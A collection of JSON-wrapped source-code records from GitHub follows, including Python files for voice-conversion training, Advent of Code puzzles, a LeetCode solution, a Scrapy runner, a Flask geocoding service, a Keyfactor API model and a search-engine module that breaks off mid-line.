(step+1)/2\n num_vc = (step+1)/2\n\n val_loss_tts = val_loss_tts / num_tts\n val_loss_vc = val_loss_vc / num_vc\n reduced_val_tts_acces = reduced_val_tts_acces / num_tts\n reduced_val_vc_acces = reduced_val_vc_acces / num_vc\n reduced_val_tts_losses = reduced_val_tts_losses / num_tts\n reduced_val_vc_losses = reduced_val_vc_losses / num_vc\n\n print((\"Validation loss {}: TTS {:.2f} VC {:.2f}\".format(iteration, float(val_loss_tts), float(val_loss_vc))))\n logger.log_validation(val_loss_tts, reduced_val_tts_losses, reduced_val_tts_acces,\n mel_tts, mel_tts_pred, iteration, 'tts')\n logger.log_validation(val_loss_vc, reduced_val_vc_losses, reduced_val_vc_acces,\n mel_vc, mel_vc_pred, iteration, 'vc')\n print('Done!')\n\n\n# @tf.function\ndef train_step(model, criterion, tvars_main, sgd_main, tvars_sc, sgd_sc,\n batch, use_text):\n (text_input_phonelevel_padded, text_input_padded, mel_padded, mat_onehot_padded,\n expand_mat_padded, speaker_id, text_lengths, mel_lengths,\n stop_token_padded) = batch\n with tf.GradientTape(persistent=True) as tape:\n # Run the forward pass of the layer.\n # The operations that the layer applies\n # to its inputs are going to be recorded\n # on the GradientTape.\n mel_reference = [] # unused\n (mel_padded_out, mel_padded_post_out, speaker_logit_from_mel,\n speaker_logit_from_mel_hidden_text_rate,\n text_hidden, mel_hidden, mel_hidden_text_rate,\n text_logit_from_mel_hidden) = model([mel_padded, text_input_padded, mel_lengths,\n expand_mat_padded, mat_onehot_padded, speaker_id, mel_reference],\n use_text, training=True, do_voice_conversion=False)\n\n # Compute the loss value for this minibatch.\n model_outputs = [mel_padded_out, mel_padded_post_out, mel_lengths, text_lengths,\n speaker_logit_from_mel, speaker_logit_from_mel_hidden_text_rate,\n expand_mat_padded, text_input_padded, text_hidden, mel_hidden, mel_hidden_text_rate,\n text_logit_from_mel_hidden, text_input_phonelevel_padded, mat_onehot_padded]\n targets = mel_padded\n loss_list, accuracy_list, combined_loss1, combined_loss2 = \\\n criterion.compute_loss(model_outputs, targets, speaker_id)\n\n # apply gradient to all losses except speaker classifier loss\n grads = tape.gradient(combined_loss1, tvars_main)\n # gradient clipping\n # https://www.tensorflow.org/api_docs/python/tf/clip_by_global_norm\n # see: https: // stackoverflow.com / questions / 36498127 / how - to - apply - gradient - clipping - in -tensorflow\n grads, grad_norm_main = tf.clip_by_global_norm(grads, hparams.grad_clip_thresh)\n sgd_main.apply_gradients(zip(grads, tvars_main))\n\n # apply gradient to speaker classifier loss\n grads = tape.gradient(combined_loss2, tvars_sc)\n sgd_sc.apply_gradients(zip(grads, tvars_sc))\n\n return loss_list, accuracy_list, combined_loss1, combined_loss2, grad_norm_main\n\n\ndef train_batch(model, criterion, tvars_main, sgd_main, tvars_sc, sgd_sc, batch,\n use_text, iteration, logger, output_directory, val_set, learning_rate, manager_checkpoint):\n valstep = 500 # maximum number of batches for validation (all of them with batch_size = 32)\n start = time.time()\n\n (loss_list, accuracy_list, combined_loss1,\n combined_loss2, grad_norm_main) = train_step(model, criterion, tvars_main,\n sgd_main, tvars_sc, sgd_sc, batch,\n use_text)\n total_loss = combined_loss1 + combined_loss2\n duration = time.time() - start\n # Log every 200 batches.\n if use_text:\n task = 'TTS'\n else:\n task = 'VC '\n if (iteration % 100 == 0) or ((iteration-1) % 100 == 0):\n print(\"Train {} {} {:.6f}\\tGrad Norm {:.1f}\\t{:.2f}s/it\".format(task, iteration,\n float(total_loss), grad_norm_main,\n duration),\n end='\\n')\n\n if iteration > 0:\n logger.log_training(total_loss, loss_list, accuracy_list, grad_norm_main, learning_rate,\n duration, iteration, task.lower())\n\n if (iteration % hparams.iters_per_checkpoint == 0):\n save_path = manager_checkpoint.save(checkpoint_number=iteration)\n print_debug(save_path)\n validate(model, criterion, val_set, iteration, logger, hparams.batch_size,\n valstep=valstep)\n\n\ndef train(output_directory, log_directory, hparams, warmup=False):\n train_loader, val_set, _, = prepare_dataloaders(hparams)\n # we call train_batch with train_loader[step] (tts) and train_loader[step+1] (vc),\n # so len_train_loader must be even\n if len(train_loader) % 2 == 1:\n len_train_loader = len(train_loader) - 1\n else:\n len_train_loader = len(train_loader)\n\n learning_rate = hparams.learning_rate\n epochs = hparams.epochs\n\n # create and build model\n model = create_model(hparams)\n build_model(model, hparams)\n\n criterion = ParrotLoss(hparams)\n\n # optimizers\n sgd_main = optimizers.Adam(lr=tf.Variable(learning_rate))\n sgd_sc = optimizers.Adam(lr=tf.Variable(learning_rate))\n # trainable weight sets\n # split parameters into speaker classifier and the rest\n tvars_sc = model.sc_trainable_weights\n tvars_main = model.main_trainable_weights\n\n print_debug('number of main vars: %d' % len(tvars_main))\n print_debug('number of sc vars: %d' % len(tvars_sc))\n\n # ## Model Checkpoints : Initialise or Restore\n manager_checkpoint = init_checkpoint_manager(model, sgd_main, sgd_sc, output_directory,\n hparams.max_chkpt_to_keep, warmup)\n if warmup:\n # full restore of latest checkpoint\n learning_rate = sgd_main.lr.numpy()\n iteration = sgd_main.iterations.numpy()\n min_epoch = iteration // len(train_loader)\n print_debug(min_epoch)\n else:\n iteration = 0\n min_epoch = 0\n\n print_debug('eargerly? ')\n print_debug(tf.executing_eagerly())\n\n logger = prepare_directories_and_logger(output_directory, log_directory)\n\n for epoch in range(min_epoch, min_epoch+epochs):\n print(\"\\nStart of epoch %d\" % (epoch,))\n\n epoch_tic = time.time()\n # Iterate over the batches of the dataset.\n # shuffle training sentences\n train_loader.randomize()\n for step in range(0, len_train_loader, 2):\n # ###\n # VC\n # ###\n batchvc = train_loader[step+1]\n train_batch(model, criterion, tvars_main, sgd_main, tvars_sc, sgd_sc, batchvc,\n False, iteration, logger, output_directory, val_set, learning_rate, manager_checkpoint)\n iteration += 1\n # ###\n # TTS\n # ###\n batchtts = train_loader[step]\n train_batch(model, criterion, tvars_main, sgd_main, tvars_sc, sgd_sc, batchtts,\n True, iteration, logger, output_directory, val_set, learning_rate, manager_checkpoint)\n iteration += 1\n\n print('')\n print('epoch %d, elapsed time %s' % (epoch, format_time(time.time() - epoch_tic)))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\"Train VC model\")\n parser.add_argument('-o', '--output_directory', type=str, required=True,\n help='directory to save checkpoints')\n parser.add_argument('-l', '--log_directory', type=str, default='logdir',\n help='directory to save tensorboard logs (Def: %(default)s)')\n parser.add_argument('--cpu', action=\"store_true\", help=\"do not lock a GPU, and run on CPU\")\n parser.add_argument('--hparams', type=str, default=None, help='comma separated name=value pairs')\n parser.add_argument('--db_root_dir', type=str, default=None,\n help='root dir containing the db_config.py file to be used for training, if not given this will be determined from '\n 'roots.yml located in the same directry as the present script (Def: read from db_roots.yml)',\n )\n parser.add_argument('--warmup', action=\"store_true\", help=\"use last checkpoint for warmup\")\n parser.add_argument(\"--eager_mode\", action=\"store_true\",\n help=\"disable tf.function and force running in eager mode (Def: %(default)s)\")\n\n args = parser.parse_args()\n if args.eager_mode:\n tf.config.experimental_run_functions_eagerly(True)\n\n db_root_dir = get_root_dir(config_file=os.path.join(os.path.dirname(__file__), \"db_roots.yaml\"),\n dir_tag=\"root_dir\", default_dir=args.db_root_dir)\n\n hparams = create_hparams(args.hparams, root_dir=db_root_dir)\n\n if args.cpu:\n print(\"using CPU, dev mode?\")\n os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"\"\n\n train(args.output_directory, args.log_directory, hparams, warmup=args.warmup)\n","repo_name":"roebel/DeepGC","sub_path":"gender_converter/train_vc.py","file_name":"train_vc.py","file_ext":"py","file_size_in_byte":14875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"16977478235","text":"#!/usr/bin/env python3\n\nimport re\n\nfrom j2toggl_core.worklog_state import WorkLogState\n\n\nclass WorkLog:\n\n def __init__(self):\n self.state = WorkLogState.Unknown\n\n self.master_id = None\n self.second_id = None\n self.key = None\n self.activity = None\n\n self.project = None\n self.description = None\n self.startTime = None\n self.endTime = None\n self.duration = None\n self.tags = None\n\n self.tooltip = None\n\n @property\n def is_invalid(self):\n result = self.key is None \\\n or self.project is None \\\n or self.activity is None \\\n or self.description is None \\\n or self.duration <= 0\n\n return result\n","repo_name":"OttensPavel/toggl2tempo","sub_path":"j2toggl_core/worklog.py","file_name":"worklog.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"37261598268","text":"class ListNode:\n def __init__(self, val=0, following=None):\n self.val = val\n self.next = following\n\n\nclass Solution:\n def reorderList(self, initial: ListNode) -> None:\n # Empty list\n if initial is None:\n return\n\n middle = self.half(initial)\n\n # if there si just one node\n if middle is initial:\n return\n\n # if there are only 2 nodes\n # if middle is initial.next:\n # return\n\n # cut the list into two pieces\n second_half = self.reverse(middle)\n self.merge(initial, second_half)\n\n def half(self, head: ListNode) -> ListNode:\n slow = fast = head\n prev = None\n while fast is not None and fast.next is not None:\n prev = slow\n slow = slow.next\n fast = fast.next.next\n\n if slow is fast:\n return slow\n\n if fast is not None:\n prev = prev.next\n slow = slow.next\n\n prev.next = None\n\n return slow\n\n def reverse(self, head: ListNode) -> ListNode:\n pointer = head.next\n head.next = None\n while pointer is not None:\n tmp = pointer.next\n pointer.next = head\n head, pointer = pointer, tmp\n return head\n\n def merge(self, first: ListNode, second: ListNode) -> None:\n while second is not None:\n tmp = first.next\n first.next = first = second\n second = second.next\n first.next = first = tmp\n","repo_name":"Vasilic-Maxim/LeetCode-Problems","sub_path":"problems/143. Reorder List/1 - Divide - Reverse - Merge.py","file_name":"1 - Divide - Reverse - Merge.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"41322497401","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nAdvent of Code 2019, day 13.\n\n@author: James Jolley, james@jolley.co\n\"\"\"\n\nfrom day05.day05 import Computer, read_program\n\ndef part1(path):\n c = Computer(read_program(path))\n tiles = {id:set() for id in range(5)}\n while c.ram[c.ip] != 99:\n c.step()\n if len(c.out) == 3:\n x,y,tile_id = (c.out.popleft() for _ in range(3))\n tiles[tile_id].add((x,y))\n return len(tiles[2])\n\ndef part2(path):\n program = read_program(path)\n program[0] = 2\n c = Computer(program)\n score = None\n paddle = None\n ball = None\n while c.ram[c.ip] != 99:\n # when prompted for controller input, have the paddle move toward the\n # ball, if their x coordinates are different\n if c.ram[c.ip]%100 == 3:\n if paddle is None or ball is None:\n c.in_.append(0)\n elif paddle < ball:\n c.in_.append(1)\n elif paddle > ball:\n c.in_.append(-1)\n else:\n c.in_.append(0)\n c.step()\n if len(c.out) == 3:\n x,y,tile_id = (c.out.popleft() for _ in range(3))\n if (x,y) == (-1,0):\n score = tile_id\n elif tile_id == 3:\n paddle=x\n elif tile_id == 4:\n ball=x\n return score\n\n\nif __name__ == '__main__':\n print(part1('day13/input.txt'))\n print(part2('day13/input.txt'))\n\n\n","repo_name":"jolleyjames/Advent-of-Code-2019","sub_path":"day13/day13.py","file_name":"day13.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"16607624757","text":"import re\n\n# Opening the file and getting two line paths\nfo = open(\"input.txt\", \"r\")\npath_a = fo.readline().strip().split(\",\")\npath_b = fo.readline().strip().split(\",\")\nfo.close()\n\n# This function returns a list of tuple objects for each\n# segment of the line path\n# Each object has the structure: ((x1,y1),(x2,y2))\ndef create_line_list(path: list):\n prev = (0,0)\n output = []\n for point in path:\n num = int(re.findall(r\"\\d+\", point)[0])\n if \"R\" in point:\n temp = (prev,(prev[0]+num, prev[1]))\n output.append(temp)\n prev = temp[1]\n elif \"L\" in point:\n temp = (prev,(prev[0]-num, prev[1]))\n output.append(temp)\n prev = temp[1]\n elif \"U\" in point:\n temp = (prev,(prev[0], prev[1]+num))\n output.append(temp)\n prev = temp[1]\n elif \"D\" in point:\n temp = (prev,(prev[0], prev[1]-num))\n output.append(temp)\n prev = temp[1]\n\n return output\n\n# Takes two line segments defined by p1,p2 and p3,p4 and\n# returns the x,y coordinates if they intersect or False\n# if they do not\n# Using formula from Simon Walton, Dept of Computer Science, Swansea\n# http://www.cs.swan.ac.uk/~cssimon/line_intersection.html\ndef find_intersection(p1, p2, p3, p4):\n # Unpacking for readability\n x1,y1 = p1\n x2,y2 = p2\n x3,y3 = p3\n x4,y4 = p4\n\n d_a = ((x4-x3)*(y1-y2))-((x1-x2)*(y4-y3))\n d_b = ((x4-x3)*(y1-y2))-((x1-x2)*(y4-y3))\n if d_a == 0 or d_b == 0:\n # If we reach this point, it means the lines are colinear\n # or parallel. If they're colinear, all x-coords or y-coords\n # will be the same depending on if the lines are vertical or\n # horizontal and intersect at every point where the lines overlap\n # We're dealing with a discrete system because we're using\n # Manhattan distance, so we can just return a list of all\n # integer values where the lines overlap.\n # If the x-coords or y-coords aren't all the same, then the lines\n # are just parallel and we can return False for no intersect\n\n # Vertical line\n if x1 == x2 and x1 == x3 and x1 == x4:\n y_list = [y1,y2,y3,y4]\n y_list.remove(min(y_list))\n y_list.remove(max(y_list))\n yi_1 = min(y_list)\n yi_2 = max(y_list)\n output = [(x1,y) for y in range(yi_1,yi_2)]\n return output\n # Horizontal line\n elif y1 == y2 and y1 == y3 and y1 == y4:\n x_list = [x1,x2,x3,x4]\n x_list.remove(min(x_list))\n x_list.remove(max(x_list))\n xi_1 = min(x_list)\n xi_2 = max(x_list)\n output = [(x,y1) for x in range(xi_1,xi_2)]\n return output\n # Parallel lines\n else:\n return False\n else:\n t_a = (((y3-y4)*(x1-x3))+((x4-x3)*(y1-y3)))/d_a\n t_b = (((y1-y2)*(x1-x3))+((x2-x1)*(y1-y3)))/d_b\n\n if ((0 <= t_a <= 1) and (0 <= t_b <= 1)):\n # It doesn't matter which line equation we use\n # We just need t_a and t_b to verify they do intersect\n x = int(x1 + t_a*(x2-x1))\n y = int(y1 + t_a*(y2-y1))\n return (x,y)\n else:\n return False\n \n# Finally, some easy math - https://i.imgur.com/FrVGO1F.png\n# Just calculating the Manhattan distance of each intersection\n# from the origin and returning the shortest distance\n# Removes the origin from the list of intersections because duh\ndef shortest_distance(points):\n if (0,0) in points:\n points.remove((0,0))\n distances = [(abs(x)+abs(y)) for (x,y) in points]\n return min(distances)\n\na_lines = create_line_list(path_a)\nb_lines = create_line_list(path_b)\n\nintersections = []\nfor line_a in a_lines:\n for line_b in b_lines:\n intersect = find_intersection(line_a[0], line_a[1], line_b[0], line_b[1])\n # Can receive either a single point or a list of points back\n if isinstance(intersect, tuple):\n intersections.append(intersect)\n elif isinstance(intersect, list):\n intersections.extend(intersect)\n\nprint(shortest_distance(intersections))\n","repo_name":"mason-wooley/advent-of-code","sub_path":"2019/day-03/day-03-1.py","file_name":"day-03-1.py","file_ext":"py","file_size_in_byte":4174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"71181213193","text":"# coding=utf-8\n\nfrom multiprocessing import Queue, Process\nfrom scrapy.utils.project import get_project_settings\n\nfrom twisted.internet import reactor\nfrom scrapy.crawler import CrawlerProcess\n\nfrom shop.spiders.markethot_spider import MarkethotSpider\nfrom shop.spiders.megadrop24_spider import Megadrop24Spider\nfrom shop.spiders.yandex_spider import YandexSpider\nfrom web.manage import runserver\n\n\nclass CrawlRunner:\n def __init__(self, query, history):\n self.query = query\n self.history = history\n\n def run_spider(self):\n def f(q, spider):\n try:\n runner = CrawlerProcess(get_project_settings())\n deferred = runner.crawl(spider, query=self.query, history=self.history)\n deferred.addBoth(lambda _: reactor.stop())\n reactor.run()\n q.put(None)\n except Exception as e:\n q.put(e)\n\n for spider in [Megadrop24Spider, MarkethotSpider]:\n q = Queue()\n p = Process(target=f, args=(q, spider))\n p.start()\n result = q.get()\n p.join()\n\n if result is not None:\n raise result\n\n\nif __name__ == '__main__':\n runserver()","repo_name":"tromario/shop-spider","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"34225583383","text":"from flask import Flask, request, jsonify\nfrom flask_cors import CORS\nimport osmnx as ox\n\napp = Flask(__name__)\nCORS(app, origins='http://localhost:54102')\n\n@app.get('/get-geocode')\ndef get_geocode():\n address = request.args.get('address')\n \n # if address is not provided with status 400\n if address is None:\n return \"address not found\", 400\n \n # getcode the address, if invalid return an invalid message with status 400\n try:\n coordinate = ox.geocode(address)\n except ValueError:\n return \"invalid address\", 400\n \n geoData = {\"coordinate\": {\n \"lat\": coordinate[0],\n \"lon\": coordinate[1]\n }}\n \n # success return json with status 200\n return jsonify(geoData), 200\n\n# set to port 3000 for now since mac uses port 5000\nif __name__ == \"__main__\":\n app.run(debug=True, port=54101, host=\"0.0.0.0\")","repo_name":"algebra2boy/Ree-See.it","sub_path":"geo-service/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"13337268195","text":"import sys\r\n\r\nimport math\r\n\r\n\r\nclass Screen:\r\n def __init__(self, dimensions):\r\n self._screen = [[['\\x00', '\\x00', '\\x00'] for i in range(dimensions.width)] for j in range(dimensions.height)]\r\n\r\n def render(self, universe, cursor):\r\n self._screen = [[age_to_colour(cell) for cell in row] for row in universe.render()]\r\n self._screen[cursor.y][cursor.x][0] = '\\xff'\r\n\r\n rendered = \"\".join(\"\".join(\"\".join(cell) for cell in row) for row in self._screen)\r\n sys.stdout.write(rendered)\r\n sys.stdout.flush()\r\n\r\n\r\ndef age_to_colour(age):\r\n if age == 0:\r\n return ['\\x00', '\\x00', '\\x00']\r\n else:\r\n unitary = math.pow(1.8, float(- age + 1) / 10)\r\n green = int(math.floor(unitary * 0xff))\r\n blue = int(math.floor((1 - unitary) * 0xff))\r\n return ['\\x00', chr(green), chr(blue)]\r\n","repo_name":"hgcummings/floorcade","sub_path":"games/conway/conway/screen.py","file_name":"screen.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"73423487112","text":"from typing import Any, Dict, List, Type, TypeVar, Union\n\nimport attr\n\nfrom ..models.keyfactor_api_models_workflows_parameter_definition_response_control_type import (\n KeyfactorApiModelsWorkflowsParameterDefinitionResponseControlType,\n)\nfrom ..models.keyfactor_api_models_workflows_parameter_definition_response_depends_on import (\n KeyfactorApiModelsWorkflowsParameterDefinitionResponseDependsOn,\n)\nfrom ..models.keyfactor_api_models_workflows_parameter_definition_response_parameter_type import (\n KeyfactorApiModelsWorkflowsParameterDefinitionResponseParameterType,\n)\nfrom ..models.keyfactor_api_models_workflows_parameter_definition_response_potential_values import (\n KeyfactorApiModelsWorkflowsParameterDefinitionResponsePotentialValues,\n)\nfrom ..types import UNSET, Unset\n\nT = TypeVar(\"T\", bound=\"KeyfactorApiModelsWorkflowsParameterDefinitionResponse\")\n\n\n@attr.s(auto_attribs=True)\nclass KeyfactorApiModelsWorkflowsParameterDefinitionResponse:\n \"\"\"\n Attributes:\n display_name (Union[Unset, str]):\n parameter_type (Union[Unset, KeyfactorApiModelsWorkflowsParameterDefinitionResponseParameterType]):\n required (Union[Unset, bool]):\n default_value (Union[Unset, str]):\n control_type (Union[Unset, KeyfactorApiModelsWorkflowsParameterDefinitionResponseControlType]):\n potential_values (Union[Unset, KeyfactorApiModelsWorkflowsParameterDefinitionResponsePotentialValues]):\n support_token_replacement (Union[Unset, bool]):\n depends_on (Union[Unset, KeyfactorApiModelsWorkflowsParameterDefinitionResponseDependsOn]):\n \"\"\"\n\n display_name: Union[Unset, str] = UNSET\n parameter_type: Union[Unset, KeyfactorApiModelsWorkflowsParameterDefinitionResponseParameterType] = UNSET\n required: Union[Unset, bool] = UNSET\n default_value: Union[Unset, str] = UNSET\n control_type: Union[Unset, KeyfactorApiModelsWorkflowsParameterDefinitionResponseControlType] = UNSET\n potential_values: Union[Unset, KeyfactorApiModelsWorkflowsParameterDefinitionResponsePotentialValues] = UNSET\n support_token_replacement: Union[Unset, bool] = UNSET\n depends_on: Union[Unset, KeyfactorApiModelsWorkflowsParameterDefinitionResponseDependsOn] = UNSET\n additional_properties: Dict[str, Any] = attr.ib(init=False, factory=dict)\n\n def to_dict(self) -> Dict[str, Any]:\n display_name = self.display_name\n parameter_type: Union[Unset, int] = UNSET\n if not isinstance(self.parameter_type, Unset):\n parameter_type = self.parameter_type.value\n\n required = self.required\n default_value = self.default_value\n control_type: Union[Unset, int] = UNSET\n if not isinstance(self.control_type, Unset):\n control_type = self.control_type.value\n\n potential_values: Union[Unset, Dict[str, Any]] = UNSET\n if not isinstance(self.potential_values, Unset):\n potential_values = self.potential_values.to_dict()\n\n support_token_replacement = self.support_token_replacement\n depends_on: Union[Unset, Dict[str, Any]] = UNSET\n if not isinstance(self.depends_on, Unset):\n depends_on = self.depends_on.to_dict()\n\n field_dict: Dict[str, Any] = {}\n field_dict.update(self.additional_properties)\n field_dict.update({})\n if display_name is not UNSET:\n field_dict[\"DisplayName\"] = display_name\n if parameter_type is not UNSET:\n field_dict[\"ParameterType\"] = parameter_type\n if required is not UNSET:\n field_dict[\"Required\"] = required\n if default_value is not UNSET:\n field_dict[\"DefaultValue\"] = default_value\n if control_type is not UNSET:\n field_dict[\"ControlType\"] = control_type\n if potential_values is not UNSET:\n field_dict[\"PotentialValues\"] = potential_values\n if support_token_replacement is not UNSET:\n field_dict[\"SupportTokenReplacement\"] = support_token_replacement\n if depends_on is not UNSET:\n field_dict[\"DependsOn\"] = depends_on\n\n return field_dict\n\n @classmethod\n def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:\n d = src_dict.copy()\n display_name = d.pop(\"DisplayName\", UNSET)\n\n _parameter_type = d.pop(\"ParameterType\", UNSET)\n parameter_type: Union[Unset, KeyfactorApiModelsWorkflowsParameterDefinitionResponseParameterType]\n if isinstance(_parameter_type, Unset):\n parameter_type = UNSET\n else:\n parameter_type = KeyfactorApiModelsWorkflowsParameterDefinitionResponseParameterType(_parameter_type)\n\n required = d.pop(\"Required\", UNSET)\n\n default_value = d.pop(\"DefaultValue\", UNSET)\n\n _control_type = d.pop(\"ControlType\", UNSET)\n control_type: Union[Unset, KeyfactorApiModelsWorkflowsParameterDefinitionResponseControlType]\n if isinstance(_control_type, Unset):\n control_type = UNSET\n else:\n control_type = KeyfactorApiModelsWorkflowsParameterDefinitionResponseControlType(_control_type)\n\n _potential_values = d.pop(\"PotentialValues\", UNSET)\n potential_values: Union[Unset, KeyfactorApiModelsWorkflowsParameterDefinitionResponsePotentialValues]\n if isinstance(_potential_values, Unset):\n potential_values = UNSET\n else:\n potential_values = KeyfactorApiModelsWorkflowsParameterDefinitionResponsePotentialValues.from_dict(\n _potential_values\n )\n\n support_token_replacement = d.pop(\"SupportTokenReplacement\", UNSET)\n\n _depends_on = d.pop(\"DependsOn\", UNSET)\n depends_on: Union[Unset, KeyfactorApiModelsWorkflowsParameterDefinitionResponseDependsOn]\n if isinstance(_depends_on, Unset):\n depends_on = UNSET\n else:\n depends_on = KeyfactorApiModelsWorkflowsParameterDefinitionResponseDependsOn.from_dict(_depends_on)\n\n keyfactor_api_models_workflows_parameter_definition_response = cls(\n display_name=display_name,\n parameter_type=parameter_type,\n required=required,\n default_value=default_value,\n control_type=control_type,\n potential_values=potential_values,\n support_token_replacement=support_token_replacement,\n depends_on=depends_on,\n )\n\n keyfactor_api_models_workflows_parameter_definition_response.additional_properties = d\n return keyfactor_api_models_workflows_parameter_definition_response\n\n @property\n def additional_keys(self) -> List[str]:\n return list(self.additional_properties.keys())\n\n def __getitem__(self, key: str) -> Any:\n return self.additional_properties[key]\n\n def __setitem__(self, key: str, value: Any) -> None:\n self.additional_properties[key] = value\n\n def __delitem__(self, key: str) -> None:\n del self.additional_properties[key]\n\n def __contains__(self, key: str) -> bool:\n return key in self.additional_properties\n","repo_name":"Keyfactor/keyfactor-python-client-sdk","sub_path":"kfclient/keyfactor_v_1_client/models/keyfactor_api_models_workflows_parameter_definition_response.py","file_name":"keyfactor_api_models_workflows_parameter_definition_response.py","file_ext":"py","file_size_in_byte":7045,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"70870847113","text":"#WAP to convert given value into binary\nlist1=[]\na=int(input(\"Enter a number:\"))\nz=a\nwhile a>0:\n x=a%2\n a//=2\n list1.append(x)\nlist1.reverse()\nprint(\"Binary for given no:\",z,\" is:\",list1)","repo_name":"ChinmayNaik27/Python_Programs","sub_path":"list/conversion.py","file_name":"conversion.py","file_ext":"py","file_size_in_byte":196,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"3021443688","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 29 17:34:55 2017\n\n@author: Rodrigo Azevedo\n\nModulo de buscador\n\"\"\"\n\nimport time\nimport logging\nimport configparser\nimport xml.etree.ElementTree as ET\nimport re\nimport csv\nimport ast\nimport math\nfrom unidecode import unidecode\nimport nltk\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom nltk.stem.porter import PorterStemmer\n\n# função para calcular cosine similarity\ndef cos_sim(A, B):\n num = 0\n A_den = 0\n B_den = 0\n for word_id, value in A.items():\n if word_id in B:\n num = num + value * B[word_id]\n A_den = A_den + value**2\n for word_id, value in B.items():\n B_den = B_den + value**2\n return (1.0*num)/(math.sqrt(A_den)*math.sqrt(B_den))\n\ndef run(EnablePorterStemmer = False):\n logging.info('Modulo de busca iniciado')\n \n config = configparser.ConfigParser()\n config.read('busca.cfg')\n file_model = config.get('config', 'MODELO')\n file_query = config.get('config', 'CONSULTAS')\n file_result = config.get('config', 'RESULTADOS')\n logging.info('Leitura do arquivo de configuração')\n \n csv.field_size_limit(500 * 1024 * 1024) # problema com 'field larger than field limit (131072)'\n with open(file_model, 'r') as csvfile:\n logging.info('Leitura do arquivo de modelo de indexação '+str(file_model))\n reader = csv.reader(csvfile, delimiter=';')\n for row in reader:\n if len(row):\n if row[0] == 'TOKENS':\n words_dict = ast.literal_eval(row[1])\n elif row[0] == 'MODEL':\n dict_doc_word = ast.literal_eval(row[1])\n elif row[0] == 'REVERSE':\n new_dict = ast.literal_eval(row[1])\n \n total_words = len(words_dict)\n total_documents = 0\n \n for document_id in dict_doc_word:\n total_documents = int(max(total_documents, document_id))\n \n # matrix esparca doc word\n #dict_doc_word = {}\n #for word_id in range(len(matrix_word_doc)):\n # for document_id, f in matrix_word_doc[word_id].items():\n # if document_id not in dict_doc_word:\n # dict_doc_word[document_id] = {}\n # dict_doc_word[document_id][word_id] = f\n #total_documents = int(max(total_documents, document_id))\n \n # matrix esparca doc word\n #for i in range(len(matrix_word_doc)):\n # for key, value in matrix_word_doc[i].items():\n # matrix_doc_word[key][i] = value\n \n # obter word pelo key\n #words_key = ['' for x in range(total_words)]\n #for key, value in words_dict.items():\n # words_key[value] = key\n \n # transpoe a matrix em documentos x termos\n #t_matrix = [list(i) for i in zip(*matrix)]\n \n tf_dict = {}\n for key, value in new_dict.items():\n tf_dict[key] = len(dict([(i, value.count(i)) for i in set(value)]))\n \n xml = ET.parse(file_query)\n logging.info('Leitura do arquivo de consultas '+str(file_query))\n root = xml.getroot()\n \n total_time = 0\n total_query = 0\n to_save = []\n for el in root.findall('QUERY'):\n start_time = time.time()\n total_query = total_query + 1\n num = int(el.find('QueryNumber').text)\n text = str(el.find('QueryText').text).upper()\n abstract = unidecode(text)\n tokenized = nltk.word_tokenize(abstract)\n if EnablePorterStemmer == True:\n stemmer = PorterStemmer()\n stemmed = [stemmer.stem(token) for token in tokenized]\n abstract = (' '.join(stemmed)).upper()\n tokenized = nltk.word_tokenize(abstract)\n tokens = {}\n # obtem tokens da query\n for token in tokenized:\n word = re.sub('[^A-Z]', '', token)\n if len(word) > 1:\n tokens[word] = 1\n # cria o vetor da query\n #query_vec = [0 for x in range(total_words)]\n query_vec = {}\n # atribui pesos no vetor\n for key in tokens:\n # palavras na consulta podem nao ter sido indexadas\n if key in words_dict:\n nd = total_documents\n df = tf_dict[key]*1.0\n idf = math.log((1.0+nd)/(1.0+df)) + 1 # calculo do idf\n tf = tokens[key]\n query_vec[words_dict[key]] = tf * idf\n # l2 normalization\n s = 0\n for key, value in query_vec.items():\n s = s + value**2\n s = math.sqrt(s)\n for key, value in query_vec.items():\n query_vec[key] = value / (s * 1.0)\n results = []\n for doc_id, value in dict_doc_word.items():\n doc = doc_id\n # cria o vetor do documento\n #doc_vec = [0 for x in range(total_words)]\n #for word_key, word_f in dict_doc_word[doc].items():\n # doc_vec[word_key] = word_f\n doc_vec = dict_doc_word[doc]\n #sim = cosine_similarity([query_vec], [doc_vec])\n sim = cos_sim(query_vec, doc_vec)\n #print(key + ' ' + str(sim)) #if sim > 0.7071:\n #results.append([doc_id, sim[0][0]])\n results.append([doc_id, sim])\n results.sort(key=lambda x: x[1], reverse=True)\n #results = results[:100]\n to_res = []\n for i in range(len(results)):\n res = [(i+1)]\n res.extend(results[i])\n to_res.append(res)\n to_save.append([num, to_res])\n total_time = total_time + time.time() - start_time\n \n logging.info('Finalizado processo de busca')\n logging.info('Tempo total de processamento: '+str(total_time)+' segundos')\n logging.info('Processamento médio por consulta: '+str(total_time/total_query)+' segundos')\n \n logging.info('Salvando arquivo de resultado de busca')\n # salvando dict de tokens, dict de documents e matriz em arquivo\n with open(file_result, 'w') as csv_file:\n writer = 